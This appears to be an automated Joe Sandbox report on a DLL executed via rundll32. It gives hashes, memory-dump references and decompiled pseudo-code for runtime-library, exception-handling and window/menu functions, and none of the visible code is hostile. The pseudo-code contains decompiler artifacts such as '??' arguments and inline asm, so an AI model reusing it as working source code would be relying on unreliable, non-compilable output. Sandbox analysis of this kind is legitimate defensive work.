Part of subcall function 1000CF24: DName::operator=.LIBVCRUNTIME ref: 1000CFB3

DName::operator+.LIBCMT ref: 1000BB24
DName::operator=.LIBVCRUNTIME ref: 1000BB64
DName::DName.LIBVCRUNTIME ref: 1000BB7C
DName::operator+.LIBCMT ref: 1000BB8B
DName::operator+.LIBCMT ref: 1000BB97

Part of subcall function 1000CF24: Replicator::operator[].LIBVCRUNTIME ref: 1000CF61

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: 31b5ecf051329b541345bd7913f4edbac89e0eeeccac291c9b78518f8dea3edb
Instruction ID: 865cfd34c394bda65aa44f7df4ae2116b870d9faa91fa5b2e98e0a47c1a3d343
Opcode Fuzzy Hash: 31b5ecf051329b541345bd7913f4edbac89e0eeeccac291c9b78518f8dea3edb
Instruction Fuzzy Hash: 9AC1BF71D006489FEB20CFA4C985FEEBBF8EB05380F10445DE14AE7289EB75AA44CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1002E173, Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002E173(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x1004d788) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E100268B3(_t46);
							E1002EC4B( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E100268B3(_t47);
							E1002F136( *((intOrPtr*)(_t74 + 0x88)));
						}
						E100268B3( *((intOrPtr*)(_t74 + 0x7c)));
						E100268B3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E100268B3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E100268B3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E100268B3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E100268B3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E1002E2E4( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x1004d178) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E100268B3(_t31);
							E100268B3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E100268B3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E100268B3(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 1002E1B7

Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC68
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC7A
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC8C
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC9E
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECB0
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECC2
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECD4
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECE6
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECF8
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED0A
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED1C
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED2E
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED40

_free.LIBCMT ref: 1002E1AC

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002E1CE
_free.LIBCMT ref: 1002E1E3
_free.LIBCMT ref: 1002E1EE
_free.LIBCMT ref: 1002E210
_free.LIBCMT ref: 1002E223
_free.LIBCMT ref: 1002E231
_free.LIBCMT ref: 1002E23C
_free.LIBCMT ref: 1002E274
_free.LIBCMT ref: 1002E27B
_free.LIBCMT ref: 1002E298
_free.LIBCMT ref: 1002E2B0

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 44666f3e792033bf78c52a5bc1681bd2bdcfbab39e3579f54de7d788c7dc3adf
Instruction ID: b2064f8893aa3c5965b5dc156e633d10c076f5acde63b25f045ac74ecc00f496
Opcode Fuzzy Hash: 44666f3e792033bf78c52a5bc1681bd2bdcfbab39e3579f54de7d788c7dc3adf
Instruction Fuzzy Hash: DA315A31A40381DFEB20DAB8FD41B4A73E9EF04394FA14529F85AD6291DE30BD548B60

Uniqueness

Uniqueness Score: -1.00%

Function 1002ED49, Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1002ED49(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E10026850(1, 0x50);
					_v8 = _t235;
					E100268B3(0);
					if(_t235 != 0) {
						_t228 = E10026850(1, 4);
						_v12 = _t228;
						E100268B3(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x1004d788, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E10026850(1, 4);
							_v16 = _t233;
							E100268B3(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x15, _t14);
								_t118 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x14, _v8 + 0x10);
								_t122 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x16, _v8 + 0x14);
								_t126 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t130 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x18, _v8 + 0x1c);
								_t134 = E10037D5C(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20);
								_t138 = E10037D5C(_t225,  &_v28, 1, _t234, 0x51, _v8 + 0x24);
								_t142 = E10037D5C(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28);
								_t146 = E10037D5C(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29);
								_t150 = E10037D5C(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a);
								_t154 = E10037D5C(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b);
								_t158 = E10037D5C(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c);
								_t162 = E10037D5C(_t225,  &_v28, 0, _t234, 0x57, _v8 + 0x2d);
								_t166 = E10037D5C(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e);
								_t170 = E10037D5C(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f);
								_t174 = E10037D5C(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38);
								_t178 = E10037D5C(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c);
								_t182 = E10037D5C(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40);
								_t186 = E10037D5C(_t225,  &_v28, 2, _t234, 0x17, _v8 + 0x44);
								_t190 = E10037D5C(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48);
								if((E10037D5C(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E1002EC4B(_v8);
								E100268B3(_v8);
								E100268B3(_v12);
								E100268B3(_v16);
								goto L4;
							}
							E100268B3(_t235);
							E100268B3(_v12);
							L7:
							goto L4;
						}
						E100268B3(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x1004d788;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E100268B3( *(_t209 + 0x88));
							E100268B3( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

APIs

_free.LIBCMT ref: 1002ED91
_free.LIBCMT ref: 1002EDB5
_free.LIBCMT ref: 1002EDC2
_free.LIBCMT ref: 1002EDE7
_free.LIBCMT ref: 1002EDF4
_free.LIBCMT ref: 1002EDFD
_free.LIBCMT ref: 1002F0D7
_free.LIBCMT ref: 1002F0DF

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1a240f892e8593a50400601262b879b35f34ed492d8f44eebeb0a983b2f9046c
Instruction ID: 8ee7e6e7f1e9dc527fc3b3db97b70811b20268164f27ddc043a2abe035561a2d
Opcode Fuzzy Hash: 1a240f892e8593a50400601262b879b35f34ed492d8f44eebeb0a983b2f9046c
Instruction Fuzzy Hash: C5C14376D40205AFDB20CBA8DC82FEE77F8EF09750F554165FA09FB282D670A9458B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001AC4, Relevance: 18.1, APIs: 12, Instructions: 142
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10001AC4(void* __edx, struct HWND__* _a4, int _a8, unsigned int _a12, unsigned int _a16) {
				signed int _v8;
				struct tagRECT _v24;
				char _v25;
				unsigned int _v32;
				void* __ebp;
				signed int _t21;
				void* _t25;
				long _t29;
				void* _t31;
				void* _t44;
				void* _t51;
				void* _t52;
				struct HBRUSH__* _t55;
				struct HWND__* _t61;
				void* _t62;
				unsigned int _t67;
				struct HMENU__* _t68;
				struct HDC__* _t69;
				unsigned int _t70;
				signed int _t73;
				void* _t77;

				_t66 = __edx;
				_t21 =  *0x1004d054; // 0xda1f8931
				_v8 = _t21 ^ _t73;
				_t61 = _a4;
				_t70 = _a16;
				_v32 = _t70;
				_t77 = _a8 - 0x111;
				if(_t77 > 0) {
					_t25 = _a8 - 0x200;
					if(_t25 == 0) {
						_t29 = E100015F8(_t62, _t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
						goto L21;
					} else {
						_t31 = _t25 - 1;
						if(_t31 == 0) {
							_t29 = E1000144D(_t62, __edx, _t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
							goto L21;
						} else {
							if(_t31 == 1) {
								_t29 = E100014BD(_t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
								L21:
							} else {
								goto L17;
							}
						}
					}
				} else {
					if(_t77 == 0) {
						L11:
						_t67 = _a12;
						_v25 = 1;
						_t29 = E1000134B(_t61, _t67 & 0x0000ffff, _t67 >> 0x10, _t70,  &_v25);
						if(_v25 == 0) {
							_push(_t70);
							_push(_t67);
							goto L13;
						}
					} else {
						_t44 = _a8 - 1;
						if(_t44 == 0) {
							_t68 = GetSubMenu(GetMenu(_t61), 1);
							CheckMenuRadioItem(_t68, 0xca, 0xcb, 0xca, 8);
							CheckMenuItem(_t68, 0xcc, 8);
							CheckMenuItem(_t68, 0xcd, 8);
							_t70 = _v32;
							goto L11;
						} else {
							_t51 = _t44 - 1;
							if(_t51 == 0) {
								PostQuitMessage(0);
								goto L7;
							} else {
								_t52 = _t51 - 0xd;
								if(_t52 == 0) {
									_t29 = E1000168B(_t61);
								} else {
									if(_t52 != 5) {
										L17:
										_push(_t70);
										_push(_a12);
										L13:
										_t29 = DefWindowProcA(_t61, _a8, ??, ??);
									} else {
										_t69 = GetDC(_t61);
										_t55 = GetClassLongA(_t61, 0xfffffff6);
										GetClientRect(_t61,  &_v24);
										FillRect(_t69,  &_v24, _t55);
										ReleaseDC(_t61, _t69);
										L7:
										_t29 = 0;
									}
								}
							}
						}
					}
				}
				return E100037EA(_t29, _v8 ^ _t73, _t66);
			}

APIs

GetDC.USER32(?), ref: 10001B10
GetClassLongA.USER32(?,000000F6), ref: 10001B1B
GetClientRect.USER32 ref: 10001B28
FillRect.USER32(00000000,?,00000000), ref: 10001B34
ReleaseDC.USER32(?,00000000), ref: 10001B3C
PostQuitMessage.USER32 ref: 10001B57
GetMenu.USER32 ref: 10001B60
GetSubMenu.USER32 ref: 10001B69
CheckMenuRadioItem.USER32(00000000,000000CA,000000CB,000000CA,00000008), ref: 10001B80
CheckMenuItem.USER32 ref: 10001B94
CheckMenuItem.USER32 ref: 10001B9E
DefWindowProcA.USER32(?,?,?,?), ref: 10001BCE

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$CheckItem$Rect$ClassClientFillLongMessagePostProcQuitRadioReleaseWindow
String ID:
API String ID: 3289233142-0
Opcode ID: fe191d6ca87df1940fad0c56e3fec9642e8807648afcb1238b1305a9262ed2d6
Instruction ID: d4f665b8c9981696cb7546183abca082bb285263bca3685d46a9f30bb4881cd0
Opcode Fuzzy Hash: fe191d6ca87df1940fad0c56e3fec9642e8807648afcb1238b1305a9262ed2d6
Instruction Fuzzy Hash: 7241B2B2A40119BBF710DFB98E84EFF3BACEB05391F414505FA02E61A6D778D9109764

Uniqueness

Uniqueness Score: -1.00%

Function 1000134B, Relevance: 18.1, APIs: 12, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000134B(struct HWND__* _a4, int _a8, char* _a20) {
				signed int _v8;
				struct tagRECT _v24;
				struct HMENU__* _v28;
				void* __ebp;
				signed int _t12;
				char* _t14;
				struct HMENU__* _t19;
				void* _t25;
				struct HMENU__* _t29;
				struct HWND__* _t32;
				void* _t36;
				int _t37;
				RECT* _t38;
				signed int _t39;
				void* _t40;

				_t12 =  *0x1004d054; // 0xda1f8931
				_v8 = _t12 ^ _t39;
				_t14 = _a20;
				_t32 = _a4;
				_t37 = _a8;
				_t40 = _t37 - 0xc9;
				if(_t40 == 0) {
					DestroyWindow(_t32);
					L15:
					return E100037EA(0, _v8 ^ _t39, _t36);
				}
				if(_t40 <= 0) {
					L13:
					 *_t14 = 0;
					goto L15;
				}
				if(_t37 <= 0xcb) {
					_t19 = GetSubMenu(GetMenu(_t32), 1);
					_t38 = 0;
					CheckMenuRadioItem(_t19, 0xca, 0xcb, _t37, 0);
					if(_t37 != 0xca) {
						GetClientRect(_t32,  &_v24);
						 *0x1004dbcc = CreateRectRgnIndirect( &_v24);
						goto L15;
					}
					_t25 =  *0x1004dbcc; // 0x0
					if(_t25 != 0) {
						DeleteObject(_t25);
						 *0x1004dbcc = 0;
					}
					L8:
					RedrawWindow(_t32, _t38, _t38, 0x105);
					goto L15;
				}
				if(_t37 > 0xcd) {
					goto L13;
				}
				_t29 = GetSubMenu(GetMenu(_t32), 1);
				_t38 = 0;
				_v28 = _t29;
				if((GetMenuState(_t29, _t37, 0) & 0x00000008) == 0) {
					_push(8);
				} else {
					_push(0);
				}
				CheckMenuItem(_v28, _t37, ??);
				goto L8;
			}

APIs

GetMenu.USER32 ref: 1000138F
GetSubMenu.USER32 ref: 10001398
GetMenuState.USER32(00000000,?,00000000), ref: 100013A6
CheckMenuItem.USER32 ref: 100013B9
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 100013C7
GetMenu.USER32 ref: 100013D0
GetSubMenu.USER32 ref: 100013D9
CheckMenuRadioItem.USER32(00000000,000000CA,000000CB,?,00000000), ref: 100013EE
DeleteObject.GDI32(00000000), ref: 10001406
GetClientRect.USER32 ref: 10001419
CreateRectRgnIndirect.GDI32(?), ref: 10001423
DestroyWindow.USER32 ref: 10001436

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$CheckItemRectWindow$ClientCreateDeleteDestroyIndirectObjectRadioRedrawState
String ID:
API String ID: 2213066218-0
Opcode ID: a7e5d02df13b2adb80e4cd68cb86caf5d6b54ca8aeb4eb4cebfab569da949aeb
Instruction ID: 7486e58d24ad4b75999b07b7e2b9891a1c61c82330dbe42b58659f29cda41840
Opcode Fuzzy Hash: a7e5d02df13b2adb80e4cd68cb86caf5d6b54ca8aeb4eb4cebfab569da949aeb
Instruction Fuzzy Hash: F5215974A01225ABFB10DBA5CEC8E8F7BACEB16781F814015FA02E71A1C7749900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10005DB9, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10005DB9(signed int __ecx, signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				signed int _t205;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t225;
				void* _t226;
				signed char _t230;
				signed int _t231;
				void* _t233;
				signed int _t234;
				void* _t237;
				void* _t240;
				signed char _t247;
				intOrPtr* _t252;
				void* _t255;
				signed int* _t257;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed char* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t308;
				signed char* _t311;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t333;
				void* _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t340;

				_t303 = __edx;
				_t279 = __ecx;
				_push(_t322);
				_t308 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E1000D9B3(_a8, _a16, _t308);
				_t338 = _t337 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t308[1]) {
					L69:
					_t204 = E10012120(_t274, _t279, _t303, _t322);
					asm("int3");
					_t335 = _t338;
					_t339 = _t338 - 0x38;
					_push(_t274);
					_t275 = _v116;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t204;
					} else {
						_push(_t322);
						_push(_t308);
						_t205 = E10005A3D(_t275, _t279, _t303, _t322);
						__eflags =  *(_t205 + 8);
						if( *(_t205 + 8) != 0) {
							__imp__EncodePointer(0);
							_t322 = _t205;
							_t225 = E10005A3D(_t275, _t279, _t303, _t322);
							__eflags =  *((intOrPtr*)(_t225 + 8)) - _t322;
							if( *((intOrPtr*)(_t225 + 8)) != _t322) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t217 = E10004D85(_t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t339 = _t339 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							E10004CB7(_t275, _t279, 0, _t322,  &_v44,  &_v28, _a20, _a12, _t206);
							_t305 = _v40;
							_t340 = _t339 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t305;
							__eflags = _t305 - _v32;
							if(_t305 >= _v32) {
								goto L86;
							}
							_t281 = _t305 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t281, _t282 << 2);
								_t340 = _t340 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t223[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E10005D39(_t305, _t275, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t305 = _v12;
										_t340 = _t340 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t305 = _t305 + 1;
								_t217 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t305;
								_v16 = _t281;
								__eflags = _t305 - _v32;
							} while (_t305 < _v32);
							goto L86;
						}
						E10012120(_t275, _t279, _t303, _t322);
						asm("int3");
						_push(_t335);
						_t304 = _v188;
						_push(_t275);
						_push(_t322);
						_push(0);
						_t208 = _t304[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t280 = _t208 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L111;
							} else {
								__eflags =  *_t304 & 0x00000080;
								_t311 = _v0;
								if(( *_t304 & 0x00000080) == 0) {
									L93:
									_t276 = _t311[4];
									_t324 = 0;
									__eflags = _t208 - _t276;
									if(_t208 == _t276) {
										L103:
										__eflags =  *_t311 & 0x00000002;
										if(( *_t311 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t324 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t304 & 0x00000002;
													if(( *_t304 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t304 & 0x00000001;
												if(( *_t304 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t304 & 0x00000008;
											if(( *_t304 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t324;
									} else {
										_t187 = _t276 + 8; // 0x6e
										_t212 = _t187;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t212;
											if(_t277 !=  *_t212) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L99:
												_t213 = _t324;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t212 + 1));
												if(_t278 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t212 = _t212 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t311 & 0x00000010;
									if(( *_t311 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t274 = _a4;
